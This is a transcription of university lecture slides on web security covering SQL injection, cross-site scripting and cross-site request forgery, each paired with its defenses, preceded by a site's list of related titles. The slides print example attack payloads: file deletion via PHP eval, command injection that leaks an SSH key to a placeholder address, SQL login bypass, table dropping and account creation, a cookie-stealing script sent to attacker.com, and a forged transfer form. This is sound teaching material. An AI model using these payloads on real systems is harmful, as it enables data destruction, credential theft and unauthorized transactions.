web security s642 computer security adam everspaugh

Similar documents
Web Application Security

Web Application Security

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Project 2: Web Security Pitfalls

Web Application Security

Introduction to Computer Security

Cross-Site Scripting

Cross Site Scripting Prevention

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

NoSQL, But Even Less Security Bryan Sullivan, Senior Security Researcher, Adobe Secure Software Engineering Team

Web-Application Security

Hacking de aplicaciones Web

Web Application Firewalls. Our focus: web app code. Web app code. Secure Web Site Design. Common vulnerabilities (OWASP) Dan Boneh

Check list for web developers

Dawn Song

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Sidste chance for Early Bird! Tilmeld dig før d. 30. juni og spar DKK. Læs mere og tilmeld dig på

Web Application Guidelines

CTF Web Security Training. Engin Kirda

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Security features of ZK Framework

EECS 398 Project 2: Classic Web Vulnerabilities

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Criteria for web application security check. Version

State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell

A Survey on Threats and Vulnerabilities of Web Services

Network Security Web Security

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Web application security

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Complete Cross-site Scripting Walkthrough

Magento Security and Vulnerabilities. Roman Stepanov

SQL Injection. Slides thanks to Prof. Shmatikov at UT Austin

Defending against XSS,CSRF, and Clickjacking David Bishop

The Top Web Application Attacks: Are you vulnerable?

Hack Yourself First. Troy troyhunt.com

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Attacks on Clients: Dynamic Content & XSS

Secure development and the SDLC. Presented By Jerry

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

KEYWORDS: Internet Applications, Security, Languages, Review and evaluation.

Ruby on Rails Secure Coding Recommendations

Still Aren't Doing. Frank Kim

Prevent Cross-site Request Forgery: PCRF

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Web Application Security. Srikumar Venugopal S2, Week 8, 2013

Advanced Security for Systems Engineering VO 01: Web Application Security

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

Exploits: XSS, SQLI, Buffer Overflow

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

University of Wisconsin Platteville SE411. Senior Seminar. Web System Attacks. Maxwell Friederichs. April 18, 2013

Gateway Apps - Security Summary SECURITY SUMMARY

Web Security: Injection Attacks

Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Web Application Security Considerations

Cyber Security Challenge Australia 2014

What is Web Security? Motivation

(WAPT) Web Application Penetration Testing

Cross Site Scripting in Joomla Acajoom Component

SECURE APPLICATION DEVELOPMENT CODING POLICY OCIO TABLE OF CONTENTS

Where every interaction matters.

Sitefinity Security and Best Practices

Network Security Exercise #8

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Security Testing with Selenium

Sichere Webanwendungen mit Java

Intrusion detection for web applications

Web Security Testing Cookbook*

Hack-proof Your Drupal App. Key Habits of Secure Drupal Coding

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

WEB ATTACKS AND COUNTERMEASURES

Preventing Abuse of Cookies Stolen by XSS

Hack Proof Your Webapps

A Tale of the Weaknesses of Current Client-side XSS Filtering

Chapter 1 Web Application (In)security 1

Lab 3 Assignment (Web Security)

Secure Coding in Node.js

Insight into web application security and why you should care about it

OWASP AND APPLICATION SECURITY

Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.

Auditing Web Applications

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Øredev Web application testing using a proxy. Lucas Nelson, Symantec Inc.

Next Generation Clickjacking

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Advanced Web Security, Lab

Columbia University Web Security Standards and Practices. Objective and Scope

Client Side Filter Enhancement using Web Proxy

Hacking Intranet Websites from the Outside

Security Model for the Client-Side Web Application Environments

Transcription:

web security s642 adam everspaugh ace@cs.wisc.edu computer security

today SQL Injection Cross-site scripting (XSS) Cross-site request forgery (XSRF)

web vulnerabilities

[https://www.wordfence.com/learn/how-to-prevent-file-upload-vulnerabilities, jan 2016] wordpress

XSRF DoS Info leak SQL injection XSS Gain privilege Bypass Execute code [https://www.keycdn.com/blog/drupal-security, feb 2016] drupal

top vulnerabilities SQL Injection / Insert malicious SQL commands to read/modify database on the web server Cross-site Request Forgery (XSRF / CSRF) / Malicious site A uses stored browser credentials for site B to do perform unauthorized actions on site B Cross-site scripting (XSS) / Malicious site A sends client javascript that abuses victim site B

eval(cmd) executes string cmd as PHP code http://example.com/calc.php... $in = $_GET['exp']; eval('$ans = '. $in. ';');... What can an adversary do? http://example.com/calc.php?exp="11; system('rm *')" warmup: php vulnerability

$email = $_POST["email"] $subject = $_POST["subject"] system("mail $email s $subject < /tmp/please_join_my_network_on_linkedin") http://example.com/send.php What can an adversary do? http://example.com/send.php?email=pwned@haxor.com &subject="foo < /root/.ssh/id_rsa; ls" warmup: command injection

99 php problems Many other common problems with PHP File handling / http://example.com/servsideinclude.php?i=file.html Global variables / http://example.com/checkcreds?user="bob; $auth=true" Many more: / see: https://www.owasp.org/index.php/php_top_5

QL injection

GET/POST website.com HTML SQL database SELECT company, country FROM customers WHERE country <> 'USA' DROP TABLE customers more: http://www.w3schools.com/sql/sql_syntax.asp sql basics

GET/POST website.com HTML $recipient = $_POST['recipient']; $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executequery($sql); SQL database SQL in PHP sql & php

set ok = execute( "SELECT * FROM Users WHERE user='" & form("user") & "'" & "AND pwd='" & form("pwd") & "'"); if not ok.eof login success else fail; Developer expects: SELECT * FROM Users WHERE user='me' AND pwd='1234' asp example

set ok = execute( "SELECT * FROM Users WHERE user='" & form("user") & "'" & "AND pwd='" & form("pwd") & "'"); if not ok.eof login success else fail; Input: user="' OR 1=1 --" (as URL-encoded) SELECT * FROM Users WHERE user='' OR 1=1 --' AND pwd='' Result: ok.eof == false, login-bypass -- comment character, ignore rest of line asp example

set ok = execute( "SELECT * FROM Users WHERE user='" & form("user") & "'" & "AND pwd='" & form("pwd") & "'"); if not ok.eof login success else fail; Input: user="'; DROP TABLE Users --" SELECT * FROM Users WHERE user=''; DROP TABLE Users --' AND pwd='' Result: User database is lost (as URL-encoded) -- comment character, ignore rest of line asp example

set ok = execute( "SELECT * FROM Users WHERE user='" & form("user") & "'" & "AND pwd='" & form("pwd") & "'"); if not ok.eof login success else fail; Input: user="'; exec cmdshell 'net user hax0r hax0rpasswd /add' --" SELECT * FROM Users WHERE user=''; exec... Result: Add user account to the server if ASP running with high enough privileges asp example

Don't build command strings in code Use parameterize (prepared) SQL commands - Library will properly escape inputs SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd", dbconnection); cmd.parameters.add("@user", Request["user"] ); cmd.parameters.add("@pwd", Request["pwd"] ); cmd.executereader(); ASP 1.1 example sqli defenses

XSS

xss Cross-site scripting (XSS) / Malicious site A tricks client into running script that abuses victim site B Reflected (non-persistent) attacks / example: links on malicious pages, embedded in malicious email Stored (persistent) attacks / example: posted as comments to a website that permits HTML in comments

<HTML><TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY></HTML> http://victim.com/search.php?term=apple http:/victim.com/search.php?term= <script>window.open("http://attacker.com?cookie=" + document.cookie) </script> xss example

http://victim.com/search.php?term= <script>window.open( "http://attacker.com?cookie=" + document.cookie) </script> attacker.com Link clicked <html>results for <script>window.open( "http://attacker.com?cookie=" + document.cookie) </script> </html> victim.com This type of attack is called a Reflected XSS Attack xss example

demo

attacker.com Steals data Inject malicious script Visits page Receives malicious script victim.com stored xss

MySpace allowed HTML content from users Stripped <script>, but CSS allows embedded JavaScript <div id="mycode" expr="alert('hah!')" style="background:url( 'javascript:eval(document.all.mycode.expr)')"> Samy Kamkar used this to build JavaScript worm /Adds Samy as friend /Adds "but most of all, Samy is my hero" to profile /Adds worm to profile /1M infected profiles in 20 hours "samy is my hero"

xss defenses Input validation / Never trust client-side data / Remove/encoded special character Output filtering / Remove/encode special characters / HTML escaping / Attribute escaping / JavaScript escaping / CSS escaping / URL escaping Using a good template library helps

XSRF

GET /blog HTTP/1.1 login:user/pw cookie:sessionid=b98fjhw7; bank.com; secure bank.com blog.com <form action=https://bank.com/transfer method=post target=invisibleframe> <input name=recipient value=attacker/> <input name=amount value=100usd/> </form> <script>document.forms[0].submit()</script> POST /transfer HTTP/1.1 recipient=attacker&amount=100usd Cookie: sessionid=b98fjhw7 User Credentials Attack called: Cross-site request forgery XSRF or CSRF HTTP/1.1 200 OK <html>transfer completed</html> attack

xsrf defenses Secret Validation Token <input type=hidden value=23a3af01b> Referer Validation Referer: http://www.facebook.com/home.php Custom HTTP header X-Requested-By: XMLHttpRequest

secret validation token Embed into forms a large random value Require this value before processing forms Goal: Attacker can't guess, forge, or steal this token; server validates it / Why can't another site read this token in the browser? / Same-Origin Policy

GET /blog HTTP/1.1 login:user/pw cookie:sessionid=b98fjhw7; bank.com; secure bank.com blog.com <form action=https://bank.com/transfer method=post target=invisibleframe> <input name=recipient value=attacker/> <input name=amount value=100usd/> </form> <script>document.forms[0].submit()</script> POST /transfer HTTP/1.1 Referrer: http://blog.com/blog recipient=attacker&amount=100usd Cookie: sessionid=b98fjhw7 HTTP/1.1 200 OK <html>transfer completed</html> referrer validation

Referrer validation Check referrer: / Referrer = bank.com OK / Referrer = blog.com NOT ok / Referrer empty??? Lenient policy (fail open) / Allow if no referrer Strict policy (fail closed) / Disallow if no referrer / More secure, but may break website under certain conditions

SQL injection Cross-site scripting (XSS) Cross-site request forgery (XSRF, CSRF) / Reflected vs stored attacks recap

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information